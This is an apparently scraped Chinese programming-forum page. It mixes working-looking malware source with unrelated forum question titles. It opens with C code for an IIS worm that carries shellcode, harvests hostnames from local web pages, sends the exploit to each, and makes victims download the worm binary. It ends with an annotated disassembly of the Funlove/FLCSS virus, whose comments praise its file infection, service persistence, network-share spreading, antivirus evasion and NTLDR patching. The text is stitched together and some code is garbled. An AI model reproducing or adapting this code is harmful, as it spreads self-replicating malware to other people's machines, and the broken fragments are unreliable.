0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xB0, 0x87, 0x67, 0x68, 0xB0, 0x87, 0x67, 0x68, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x90, 0x33, 0xC0, 0x50, 0x5B, 0x53, 0x59, 0x8B, 0xDE, 0x66, 0xB8, 0x21, 0x02, 0x03, 0xD8, 0x32, 0xC0, 0xD7, 0x2C, 0x21, 0x88, 0x03, 0x4B, 0x3C, 0xDE, 0x75, 0xF4, 0x43, 0x43, 0xBA, 0xD0, 0x10, 0x67, 0x68, 0x52, 0x51, 0x53, 0xFF, 0x12, 0x8B, 0xF0, 0x8B, 0xF9, 0xFC, 0x59, 0xB1, 0x06, 0x90, 0x5A, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54, 0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x53, 0xFF, 0x12, 0x8B, 0xF0, 0x5A, 0x33, 0xC9, 0x50, 0x58, 0xB1, 0x05, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54, 0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x33, 0xC0, 0x50, 0x40, 0x50, 0x40, 0x50, 0xFF, 0x57, 0xF4, 0x89, 0x47, 0xCC, 0x33, 0xC0, 0x50, 0x50, 0xB0, 0x02, 0x66, 0xAB, 0x58, 0xB4, 0x50, 0x66, 0xAB, 0x58, 0xAB, 0xAB, 0xAB, 0xB1, 0x21, 0x90, 0x66, 0x83, 0xC3, 0x16, 0x8B, 0xF3, 0x43, 0x32, 0xC0, 0xD7, 0x3A, 0xC8, 0x75, 0xF8, 0x32, 0xC0, 0x88, 0x03, 0x56, 0xFF, 0x57, 0xEC, 0x90, 0x66, 0x83, 0xEF, 0x10, 0x92, 0x8B, 0x52, 0x0C, 0x8B, 0x12, 0x8B, 0x12, 0x92, 0x8B, 0xD7, 0x89, 0x42, 0x04, 0x52, 0x6A, 0x10, 0x52, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xF8, 0x5A, 0x66, 0x83, 0xEE, 0x08, 0x56, 0x43, 0x8B, 0xF3, 0xFC, 0xAC, 0x84, 0xC0, 0x75, 0xFB, 0x41, 0x4E, 0xC7, 0x06, 0x8D, 0x8A, 0x8D, 0x8A, 0x81, 0x36, 0x80, 0x80, 0x80, 0x80, 0x33, 0xC0, 0x50, 0x50, 0x6A, 0x48, 0x53, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xF0, 0x58, 0x5B, 0x8B, 0xD0, 0x66, 0xB8, 0xFF, 0x0F, 0x50, 0x52, 0x50, 0x52, 0xFF, 0x57, 0xE8, 0x8B, 0xF0, 0x58, 0x90, 0x90, 0x90, 0x90, 0x50, 0x53, 0xFF, 0x57, 0xD4, 0x8B, 0xE8, 0x33, 0xC0, 0x5A, 0x52, 0x50, 0x52, 0x56, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xEC, 0x80, 0xFC, 0xFF, 0x74, 0x0F, 0x50, 0x56, 0x55, 0xFF, 0x57, 0xD8, 0x80, 0xFC, 0xFF, 0x74, 0x04, 0x85, 0xC0, 0x75, 0xDF, 0x55, 0xFF, 0x57, 0xDC, 0x33, 0xC0, 0x40, 0x50, 0x53, 0xFF, 0x57, 0xE4, 0x90, 0x90, 0x90, 0x90, 0xFF, 0x6C, 0x66, 0x73, 0x6F, 0x66, 0x6D, 0x54, 0x53, 0x21, 0x80, 0x8D, 0x84, 0x93, 0x86, 0x82, 0x95, 0x21, 0x80, 0x8D, 0x98, 0x93, 0x8A, 0x95, 0x86, 0x21, 0x80, 0x8D, 0x84, 0x8D, 0x90, 0x94, 0x86, 0x21, 0x80, 0x8D, 0x90, 0x91, 0x86, 0x8F, 0x21, 0x78, 0x8A, 0x8F, 0x66, 0x99, 0x86, 0x84, 0x21, 0x68, 0x8D, 0x90, 0x83, 0x82, 0x8D, 0x62, 0x8D, 0x8D, 0x90, 0x84, 0x21, 0x78, 0x74, 0x70, 0x64, 0x6C, 0x54, 0x53, 0x21, 0x93, 0x86, 0x84, 0x97, 0x21, 0x94, 0x86, 0x8F, 0x85, 0x21, 0x94, 0x90, 0x84, 0x8C, 0x86, 0x95, 0x21, 0x84, 0x90, 0x8F, 0x8F, 0x86, 0x84, 0x95, 0x21, 0x88, 0x86, 0x95, 0x89, 0x90, 0x94, 0x95, 0x83, 0x9A, 0x8F, 0x82, 0x8E, 0x86, 0x21, 0x90, 0x98, 0x8F, 0x4F, 0x86, 0x99, 0x86, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x2E, 0x68, 0x74, 0x72, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2F, 0x31, 0x2E, 0x30, 0x0D, 0x0A, 0x0D, 0x0A };void attack(char *host) {SOCKET s;struct hostent *he;SOCKADDR_IN sout;int i; s = socket(AF_INET,SOCK_STREAM,0); he = gethostbyname(host); if (!he) return; sout.sin_family = AF_INET; sout.sin_addr.s_addr = *((unsigned long *)he->h_addr_list[0]); sout.sin_port = htons(80); i = connect(s,(LPSOCKADDR)&sout,sizeof(sout)); if (i!=0) return; send(s,sploit,sizeof(sploit),0); closesocket(s);}void search(char *path) {WIN32_FIND_DATA wfd;HANDLE h,hf;int s;unsigned long bytesread;char *b,*v,*m; /* here we need to change into the directory that contains all the .htm files.. I assume that there is a registry entry that says where IIS keeps all the .htm files that we can pull out and chdir to here.. I think it is in HKEY_LOCAL_MACHINE\SYSTEM\CURRENT_CONTROL_SET\SERVICES\W3SVC\PARAMETERS in an entry call "Virtual Roots" but I don't have IIS so I can't test any of this :( So I'll just change to the most common default directories */ if (!SetCurrentDirectory(path)) return; h = FindFirstFile("*.htm*",&wfd); if (h!=INVALID_HANDLE_VALUE) do { hf = CreateFile(wfd.cFileName,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); s = GetFileSize(hf,NULL); m = b = (char *)malloc(s+1); ReadFile(hf,b,s,&bytesread,0); CloseHandle(hf); b[s]=0; while (*b) { v=strstr(b,"http://")+7; if ((int)v==7) break; b=strchr(v,'/'); if (!b) break; *(b++)=0; attack(v); } free(m); } while (FindNextFile(h,&wfd));}unsigned long __stdcall hunt(void *inr) { search("\\wwwroot"); search("\\www root"); search("\\inetpub\\wwwroot"); search("\\inetpub\\www root"); search("\\webshare\\wwwroot"); return 0;}void setuphostname() {char s[1024];struct hostent *he;int i; gethostname(s,1024); he = gethostbyname(s); strcpy(s,he->h_name); strcat(s,"!GET /iisworm.exe"); for (i=0; i<strlen(s); i++) s[i]+=0x21; memcpy(sploit+sizeof(sploit)-102,he->h_name,strlen(he->h_name));}void main(int argc,char **argv) {WORD wVersionRequested;WSADATA wsaData;int err;SOCKADDR_IN sin,sout;int soutsize=sizeof(sout);unsigned long threadid,bytesread;SOCKET s,in;wVersionRequested = MAKEWORD(1, 1);HANDLE hf; string sfname; GetModuleFileName(NULL,sfname,MAX_PATH) hf = CreateFile(sfname,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); sizemybytes = GetFileSize(hf,NULL); mybytes = (char *)malloc(sizemybytes); ReadFile(hf,mybytes,sizemybytes,&bytesread,0); CloseHandle(hf); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) return; setuphostname(); CreateThread(0,0,hunt,&in,0,&threadid); s = socket(AF_INET,SOCK_STREAM,0); if (s==-1) return; sin.sin_family = AF_INET; sin.sin_addr.s_addr = 0; sin.sin_port = htons(80); if (bind(s, (LPSOCKADDR)&sin, sizeof (sin))!=0) return; if (listen(s,5)!=0) return; while (1) { in = accept(s,(sockaddr *)&sout,&soutsize); CreateThread(0,0,doweb,&in,0,&threadid); }} 建議去Http://vbin.51.net看看,我看了上面的東東,現在會寫簡單的PE病毒了。 VC scoket通信的中文字符问题 死机后工程里面没东西了,这个是怎么回事呢? 进程内存释放的问题 如何解决这样的编译问题? 控件类问题 C4819警告,怎么搞定他 这样能用进程控制么??? 怎么读mp3文件的歌信息,如歌曲名称,专辑名称,演唱者,播放长度等 这个错误怎么回事? 请问CWnd::GetOwner()这个函数是什么功能? 很莫名奇趣妙的问题 哈哈哈,三十晚上我边看春节晚会边读<windows 98/2000编程实例详解>放假回来的时候以经会编计算器啦!
给点分吧,我现在急需呀。
computer: what's wrong??? wha't this? help!!!
.............从这里开始 mov ..
int 13h
自己查一下一13h的调用说明好了!!
将一个寄存器设为 pointer就可以啦!!
写引导程序时就是这样的![email protected]
{
写入病毒标记;
将病毒代码(机器代码)写入EXE文件;
修改程序的cs和ip入口,指向病毒代码;
}
else
{
此文件已经感染该病毒;
退出;
}
主要是IFS的使用问题!!怎么想到编病毒了??
; Flcss.asm
;
; disasm by Code Demon
;
; Code Demon Virus Dreaming Factory
;
;********************************************************************************************* .586 ASSUME CS:CODE,DS:CODE CODE SEGMENT USE32 VSize equ offset VEnd - VStart Phys_VSize equ 1000 main:
;*********************************************************************************************
; 开始代码
;*********************************************************************************************
VStart: call GetDelta ;此子程序用于取得病毒在内存中的开始地址,是绝大
;多数病毒都要用到的经典技术只一,对于写一些加密
;的软件有很大的帮助,莱鸟必看
lea esi,[offset HostCode + ebx]
mov edi,[esp]
sub edi,08
mov [esp],edi
movsd
movsd push dword ptr [esp + 04]
call RelocKernel32 ;重定位Kernel32 or eax,eax
jz short Exit cmp byte ptr [offset OS + ebx],00;判断操作系统的类型
jnz short NT_Srv call Create9xProcess ;建立WIN9X进程
ret NT_Srv: call CreateNTService ;建立NT服务
Exit: ret
;*********************************************************************************************
;建立NT服务的子程序
;*********************************************************************************************
CreateNTService: call RelocAdvapi32 or eax,eax
jz short CNT_Failed push 02
push 00
push 00 ; 取服务管理器的句柄
call OpenSCManagerA or eax,eax
jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable ;建立FLCSS.EXE, or eax,eax ; 已经驻留内存就退出.
jz short CNT_Exit mov edi,0F01FF
lea esi,offset [Service + ebx]
push edi
push esi
push SCM_Handle
call OpenServiceA or eax,eax
jnz short CNT_Run xor eax,eax
push eax
push eax
push eax
push eax
push eax
lea eax,[offset Buffer1 + ebx] ; flcss.exe
push eax
push 01 ;错误代码
push 02 ; 开始
push 20 ; 类型
push edi
push 00
push esi
push SCM_Handle ;句柄
call CreateServiceA ;建立服务 or eax,eax
jz short CNT_Failed CNT_Run: push 00
push 00
push eax
call StartServiceA ;开始服务 or eax,eax
jnz short CNT_Exit CNT_Failed: call StartInfectionThread ;传染子程序 CNT_Exit: ret
;*********************************************************************************************
;建立WIN9X进程的子程序
;*********************************************************************************************
Create9xProcess:
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
call CreateExecutable or eax,eax
jz short P9x_Exit
P9x_00:
xor eax,eax
lea edi,[offset Buffer2 + ebx]
push edi
push edi
mov ecx,040
repz stosd
mov cl,06
push eax
loop $ - 1
lea esi,[offset Buffer1 + ebx]
push esi
push 00
call CreateProcessA ;创建进程 or eax,eax
jnz short P9x_Exit P9x_Failed: call StartInfectionThread;传染子程序 P9x_Exit:
ret ****************************************************************************
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
****************************************************************************
CreateExecutable:
lea edi,[offset Buffer1 + ebx]
push edi push 104
push edi
call GetSystemDirectoryA ;取得系统目录 add edi,eax
mov al,'\'
stosb
lea esi,[offset Process + ebx]
movsd
movsd
movsd push 02
call OpenFile cmp eax,-1
jz short CE_Exit mov c_FileHandle,eax lea edi,[offset VImports + ebx] ;清除 import
mov eax,-1
stosd
stosd lea edi,[offset Kernel32_Relocated + ebx] ;第二个 import
mov eax,[edi - 8]
stosd push 00
lea esi,c_BytesWritten
push esi
push 0200
push ebx
push c_FileHandle
call WriteFile ; 写文件头 push 00
push esi
push 1000
push ebx
push c_FileHandle
call WriteFile ; 写入病毒主体 push c_FileHandle
call CloseHandle ;关闭文件 CE_Exit:
inc eax
ret
;************************************************************************************
;以下应该是病毒的服务程序
;************************************************************************************
VService: call GetDelta push dword ptr [esp]
call RelocKernel32 or eax,eax
jz VS_Exit cmp byte ptr [offset OS + ebx],00 ;操作系统的类型
jz short W9x_Service_Register ;注册WIN9X服务 WNT_Service_Hacknowledge: call RelocAdvapi32 ;重定位Advapi32
or eax,eax
jz VS_Exit lea esi,[offset Buffer1 + ebx] xor eax,eax
lea ecx,[offset Service + ebx]
lea edx,[offset ServiceDispatcher + ebx]
mov [esi],ecx
mov [esi + 04],edx
mov [esi + 08],eax
mov [esi + 0C],eax ; 将控制权返回给调用者
push esi
call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[offset USER32_Name + ebx]
push esi
call LoadLibraryA lea esi,[offset RegisterClassA+ ebx]
push esi
push eax
call GetProcAddress ;取进程的地址
or eax,eax
jz short VS_00 mov [esi - 06],eax lea esi,[offset Buffer1 + ebx]
mov edi,esi
xor eax,eax
mov ecx,0A
repz stosd mov dword ptr [esi + 04],-1
mov dword ptr [esi + 10],400000 ; WINDOWS9X的基址
lea eax,[offset Service + ebx]
mov [esi + 24],eax push esi
call RegisterClassA ; 这里非常重要 lea esi,[offset RegisterServiceProcess+ ebx]
push esi
push dword ptr [offset Kernel32_Base + ebx]
call GetProcAddress or eax,eax
jz short VS_00 mov [esi - 06],eax call GetCurrentProcessId ;取当前进程的ID
; 注册为服务 call GetCurrentProcessId ;取当前进程的ID
; 注册为服务进程,防止被用户
push 01 ;用CTRL+ALR+DEL从任务管理器中发现
push eax
call RegisterServiceProcess push 8000 ; 延时
call Sleep VS_00:
call StartInfectionThread VS_Exit:
ret
;*********************************************************************************************
;NT服务子程序
;*********************************************************************************************
ServiceDispatcher:
call GetDelta
lea esi,[offset ServiceHandler + ebx]
lea edi,[offset Service + ebx]
push esi
push edi
call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[offset Buffer1 + ebx]
mov edi,esi
mov ecx,06
xor eax,eax
repz stosd mov dword ptr [esi],10
mov dword ptr [esi + 04],04
mov dword ptr [esi + 08],07 push esi
push Service_Handle ;告诉WINDOWS服务已经正确的运行
call SetServiceStatus push 8000
call Sleep call StartInfectionThread ;建立进程
ret
ServiceHandler:
ret ; 当管理员关闭服务时,提示系统出错!好东西!!!
;*********************************************************************************************
;此子程序用于建立线程
;*********************************************************************************************
StartInfectionThread:
call GetTickCount
mov [offset Rand + ebx],eax lea eax,ThreadId
push eax
push 0
push 0
lea eax,[offset VThread + ebx]
push eax
push 0
push 0
call CreateThread
ret
;*********************************************************************************************
; 病毒线程
;*********************************************************************************************
VThread:
call GetDelta call InfectDrives ;感染本地文件 push 60000
call Sleep call GetRand
and al,1F
jnz short VThread call InfectNetwork ;感染网络文件
jmp short VThread ;********************************************************************************
; 通过网络传染的子程序,值得借鉴
;********************************************************************************
InfectNetwork:
lea eax,[offset MPR_Name + ebx]
push eax
call LoadLibraryA or eax,eax
jz short INet_Failed push eax
lea esi,[offset MPR_Functions + ebx]
push esi
call DLL_Relocate or eax,eax
jz short INet_Failed push 00
call NetSearch INet_Failed:
ret
;*********************************************************************************************
; 此子程序用于测试驱动器是否有效
;*********************************************************************************************
InfectDrives:
push esi call GetTickCount
mov [offset Tick + ebx],eax lea esi,[offset Buffer1 + ebx]
mov dword ptr [esi],' \:+ ebx - offset VStart'
ID_TestDrive: mov byte ptr [esi + 03],00
push esi
call GetDriveTypeA ;取驱动器类型 cmp al,03 ;硬盘?
jz short ID_DriveOk cmp al,04 ;网络驱动器?
jnz short ID_Invalid ID_DriveOk: add esi,03 push esi
call BlownAway push esi
call FileSearch ;查找文件 sub esi,03 ID_Invalid: mov al,[offset Buffer1 + ebx]
inc al
mov [offset Buffer1 + ebx],al cmp al,'Z'
jna short ID_TestDrive pop esi
ret
;*********************************************************************************************
;查找计算机
;*********************************************************************************************
NetSearch :
mov EnumBufferSize,4000
or EnumNB_Objects,-1 lea eax,WNetStructAddr
push eax
push WNetStructAddr
push 0
push 0
push 2
call WNetOpenEnumA or eax,eax
jnz NET_Close push 04
push 1000
push 4000
push 00
call VirtualAlloc or eax,eax
jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize
push eax
push esi
lea eax,EnumNB_Objects
push eax
push WNetStructAddr
call WNetEnumResourceA or eax,eax
jnz short NET_Free mov ecx,EnumNB_Objects
or ecx,ecx
jz short NET_00 NET_01:
push ecx
push esi mov esi,[esi + 14] ; 计算机名
or esi,esi
jz short NET_03 cmp word ptr [esi],0041 ; 是否为软盘
jz short NET_03 lea edi,[offset Buffer1 + ebx] NET_02: movsb
cmp byte ptr [esi],00
jnz short NET_02 mov al,'\'
stosb push edi
call BlownAway push edi
call FileSearch NET_03: pop esi mov eax,[esi + 0C]
and al,2
cmp al,2
jnz short NET_04 push esi
call NetSearch NET_04:
add esi,20
pop ecx
loop NET_01 jmp short NET_00 NET_Free:
push 8000
push 00
push EnumBufferAddr
call VirtualFree NET_Close:
push WNetStructAddr
call WNetCloseEnum
ret
;*************************************************************************************
; 查找文件子程序,这些跟以前DOS下没什么区别,
;
; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽! ^_^
;*************************************************************************************
FileSearch:
mov eax,CurrentDirEnd
mov dword ptr [eax],002A2E2A ; *.* lea edi,[offset Buffer2 + ebx]
lea esi,[offset Buffer1 + ebx]
push edi
push esi
call FindFirstFileA ;找第一个文件 cmp eax,-1
jz short RS_Exit RS_00:
mov SearchHandle,eax RS_01:
test byte ptr [edi],10 ; 测试是目录还是文件
jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],'.'
jz short RS_Next mov esi,edi
add esi,2C mov edi,CurrentDirEnd RSD_00:
movsb
cmp byte ptr [esi],0
jnz short RSD_00 mov al,'\'
stosb push edi
call FileSearch RS_Next:
lea edi,[offset Buffer2 + ebx]
push edi
push SearchHandle
call FindNextFileA ;查找下一个文件 or eax,eax
jnz short RS_01 push SearchHand
RS_Next:
lea edi,[offset Buffer2 + ebx]
push edi
push SearchHandle
call FindNextFileA ;查找下一个文件 or eax,eax
jnz short RS_01 push SearchHandle
call FindClose RS_Exit:
ret
;********************************************************************
;没什么新意,略过吧
;********************************************************************
FileTest: mov edx,[edi + 2C]
or edx,20202020
xor edx,61F81F61 lea esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染
mov ecx,0C FT_00:
lodsd
cmp edx,eax
jz short FT_Exit loop FT_00 ;************************************************************************
;注意拉,
;************************************************************************
mov esi,edi
add esi,2C FT_01:
lodsb
or al,al
jnz short FT_01 mov eax,[esi - 4] ; 扩展名判断
or eax,20202020 cmp eax,' xco' ;控件
jz short FT_02 cmp eax,' rcs' ;屏幕保护文件
jz short FT_02 cmp eax,' exe' ;标准的EXE文件
jnz short FT_Exit FT_02:
mov eax,[edi + 20] ; 文件小于2000的就不感染
cmp eax,2000
jc short FT_Exit cmp al,03 ; 检测是否已经感染
jz short FT_Exit lea esi,[offset Buffer1 + ebx] ; 取文件名和路径
lea edi,[offset Buffer3 + ebx]
push edi mov ecx,CurrentDirEnd
sub ecx,esi
repz movsb lea esi,[offset Buffer2 + ebx]
add esi,2C FT_03:
movsb
cmp byte ptr [esi - 1],0
jnz short FT_03 call InfectFile ;干活了, FT_Exit:
jmp RS_Next
;*****************************************************************************************
;感染文件子程序
;*****************************************************************************************
InfectFile:
push i_Filename
push 03 ; 打开文件
call OpenFile cmp eax,-1
jz IN_Exit mov i_FileHandle,eax push 00
push eax
call GetFileSize ;取文件大小,用于以后还原 mov i_FileSize,eax cmp al,03 ; 是否感染
jz IN_Exit lea edi,[offset Buffer3 + ebx] push 00
lea esi,i_BytesRead
push esi
push 2000
push edi
push i_FileHandle
call ReadFile
;*********************************************************************************
;以下的程序跟文件头有关,建议没基础者找一些相关资料看看
;*********************************************************************************
cmp word ptr [edi],5A4Dh ;DOS文件头,开始有点印象了吧
jnz IN_CloseFile cmp word ptr [edi + 18],0040 ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件
jnz IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; DOS文件头的大小
ja IN_CloseFile add edi,[edi + 3C] ;指向PE或NE文件头 mov eax,[edi]
cmp eax,00004550 ;PE文件吗?
jnz IN_CloseFile ;此步必须,因为WIN3.X的18H的值也大于等于40H cmp word ptr [edi + 5C],2 ; GUI????
jnz IN_CloseFile mov esi,edi
add esi,18
add si,[edi + 14] ; 将ESI指向第一个节表
push esi mov eax,[edi + 28] ; 查找包含"PE"的节表
IN_00:
mov ecx,[esi + 0C]
add ecx,[esi + 08] cmp eax,ecx
jc short IN_01 add esi,28
jmp short IN_00 IN_01:
sub eax,[esi + 0C]
add eax,[esi + 14]
mov i_EP_Offset,eax or [esi + 24],80000000 ; 将它改为可写,这里是WINDOWS跟
;DOS在程序和数据段上的一个重要改变
;也是写WINDOWS病毒要注意的地方之一
pop esi
xor ecx,ecx
mov cx,[edi + 06]
dec ecx
mov eax,ecx
mov edx,28
mul edx
add esi,eax ; ESI指向最后一个节表 mov eax,[esi + 24]
cmp al,80 ; 是否已经初始化
jz IN_CloseFile or eax,8C000000 ; 将它改为可写,
and eax,not 12000000 ; 不共享,不可丢弃
mov [esi + 24],eax mov ecx,i_FileSize ;这里好象跟SFX有点关系
mov edx,ecx
mov eax,ecx
clc
shr eax,03
sub edx,eax
sub edx,[esi + 14]
jc short IN_02 sub edx,[esi + 10]
jnc IN_CloseFile IN_02: ; 重新计算节的长度 mov edx,[esi + 08]
sub ecx,[esi + 14]
jc short IN_03 cmp edx,ecx
ja short IN_03 mov edx,ecx IN_03:
test edx,00000FFF
jz short IN_04 and edx,0FFFFF000
add edx,1000 IN_04:
mov ecx,edx
add ecx,[esi + 0C]
mov eax,ecx
add eax,4000
mov [edi + 50],eax ; 新的长度 sub ecx,[edi + 28]
add ecx,offset VStart - 100 - 08
mov i_HostDep32,ecx mov eax,edx
add eax,4000 ; 改变虚拟大小
mov [esi + 08],eax mov eax,edx
add eax,[esi + 14]
mov i_VirusOffset,eax add edx,1000 ; 改变物理大小
mov [esi + 10],edx
add edx,[esi + 14]
add edx,03 push i_FileHandle
push edx
call MapFile or eax,eax
jz short IN_CloseFile mov i_MapHandle,eax push eax
call ViewMap or eax,eax
jz short IN_CloseMap mov edx,eax lea esi,[offset Buffer3 + ebx] ; 写PE文件头
mov edi,edx
mov ecx,2000
repz movsb lea edi,[offset HostCode + ebx]
mov esi,i_EP_Offset
add esi,edx
movsd
movsd mov edi,esi ; 设置CALL GS:Virus
sub edi,08
mov eax,00E8659090
stosd
mov eax,i_HostDep32
stosd mov edi,edx
mov eax,i_FileSize
mov ecx,i_VirusOffset
sub ecx,eax
jna short IN_05 add edi,eax
xor al,al
repz stosb IN_05:
mov esi,ebx ;写入病毒主体
mov edi,edx
add edi,i_VirusOffset
mov ecx,VSize
repz movsb mov ecx,Phys_VSize - VSize + 3
repz stosb push edx
call UnmapViewOfFile IN_CloseMap: push i_MapHandle
call CloseHandle ;关闭 call Wait_A_Little ;延时 IN_CloseFile: lea esi,[offset Buffer2 + 14 + ebx] ; 恢复文件的时间
push esi
sub esi,08
push esi
sub esi,08
push esi
push i_FileHandle
call SetFileTime push i_FileHandle
call CloseHandle ;关闭文件 IN_Exit:
ret ;********************************************************************************
; 查找GetProcAddress 的子程序
;********************************************************************************
Whereis_GPA: lea esi,[offset GPA_Sigs + ebx] mov byte ptr [offset OS + ebx],00 mov eax,w_Kernel32
and eax,0FFF00000 cmp eax,0BFF00000
jnz short OS_WinNT? OS_Win9x: mov edi,0BFF70000
jmp short WG_00 OS_WinNT?: inc byte ptr [offset OS + ebx]
add esi,08
cmp eax,077F00000
jnz short OS_Win2K? mov edi,eax
jmp short WG_00 OS_Win2K?: inc byte ptr [offset OS + ebx]
add esi,08
cmp eax,077E00000
jnz short WG_Failed mov edi,077E80000 WG_00: mov edx,edi
mov ecx,20000 WG_01:
push ecx
mov ecx,08
push esi
push edi
repz cmpsb
pop edi
pop esi
pop ecx
jz short WG_02
inc edi
loop WG_01 WG_Failed: xor eax,eax
jmp short WG_03 WG_02:
add edi,03
mov [offset GetProcAddress + 1 + ebx],edi mov eax,edx
mov [offset Kernel32_Base + ebx],eax WG_03:
ret
;***************************************************************************************
;DLL 重定位子程序
;***************************************************************************************
DLL_Relocate:
mov esi,DLL_Func DR_00:
mov eax,esi
add eax,07
push eax
push DLL_Base
call GetProcAddress or eax,eax
jz short DR_03 DR_01:
mov [esi + 1],eax
add esi,07 DR_02:
lodsb
or al,al
jnz short DR_02 cmp byte ptr [esi],0B8
jz short DR_00 DR_03:
ret
;**********************************************************************************************
; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧
;**********************************************************************************************
BlownAway:
lea esi,[offset NTLDR + ebx]
mov edi,DirEnd
movsd
movsd lea edi,[offset Buffer1 + ebx]
lea esi,[offset NT4_NTLDR + ebx] cmp byte ptr [offset OS + ebx],01
jz short BA_00
add esi,10 BA_00: push edi
push esi
push 05
call PatchFile lea esi,[offset NTOSKRNL + ebx]
mov edi,DirEnd BA_01: movsb
cmp byte ptr [esi - 1],00
jnz short BA_01 lea edi,[offset Buffer1 + ebx]
lea esi,[offset NT4_NTOSKRNL + ebx] cmp byte ptr [offset OS + ebx],01
jz short BA_02
add esi,18 BA_02: push edi
push esi
push 09
call PatchFile
ret PatchFile:
push p_Filename
push 03 ; 打开文件
call OpenFile cmp eax,-1
jz short PA_Exit mov p_FileHandle,eax push 00
push eax
call GetFileSize ;取文件大小 mov p_FileSize,eax push p_FileHandle
push eax
call MapFile or eax,eax
jz short PA_CloseFile mov p_MapHandle,eax push eax
call ViewMap or eax,eax
jz short PA_CloseMap mov edx,eax mov edi,eax
mov esi,p_PatchAddr
mov ecx,p_FileSize PA_00: push ecx
push esi
push edi
mov ecx,p_PatchSize
repz cmpsb
pop edi
pop esi
pop ecx
jz short PA_01
inc edi
loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize
add esi,ecx
repz movsb PA_Unmap: push edx
call UnmapViewOfFile PA_CloseMap: push p_MapHandle
call CloseHandle PA_CloseFile: push p_FileHandle
call CloseHandle ;关闭文件 PA_Exit:
ret
;**********************************************************************************************
;此子程序用于取病毒在内存中的开始地址,经典技术
;**********************************************************************************************
GetDelta:
call delta
delta:
pop ebx
sub ebx,offset delta - VStart
ret
;**********************************************************************************************
;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法
;**********************************************************************************************
RelocKernel32:
push r_Kernel32
call Whereis_GPA or eax,eax
jz short RK_00 push eax
lea esi,[offset Kernel32_Functions + ebx]
push esi
call DLL_Relocate
RK_00:
ret
;**********************************************************************************************
; 以下是重定位Advapi32的子程序
